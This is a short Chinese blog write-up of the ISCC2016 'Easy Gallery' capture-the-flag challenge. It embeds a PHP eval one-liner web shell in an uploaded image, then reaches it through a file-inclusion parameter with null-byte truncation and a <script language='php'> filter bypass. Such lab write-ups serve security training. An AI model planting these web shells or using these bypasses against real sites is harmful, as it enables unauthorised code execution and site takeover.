ISCC2016 Easy Gallery

ISCC2016 Easy Gallery

虽然是一道上传绕过,可是绕出了新姿势,记录一下

打开题目发现有一个上传文件的地方

直接上传图片一句话

一句话的内容是:

<?php eval($_POST['Ambrose']); ?>

上传成功显示图片ID

 

拿着这个ID去找图片路径

 

通过查看图片信息得知图片在uploads/1532755715.jpg接下来就是连接菜刀,可是菜刀连不上,看了其他师傅的wp可能是绕过了菜刀。

看了wp发现这还有个文件包含

构造payload:

?page=uploads/1532755715.jpg

 返回

 

它会在文件后面再加上.php,所以用到00截断

?page=uploads/1532755715.jpg

返回:

猜是过滤了一句话中的<?之类的

这里推荐个链接:http://www.freebuf.com/articles/web/9396.html

换个方式写一句话:

<script language="php">phpinfo();</script>

上传:

 

 CTF{upl0ad_sh0uld_n07_b3_a110wed}

 

转载于:https://www.cnblogs.com/gzs-monkey/p/9382067.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值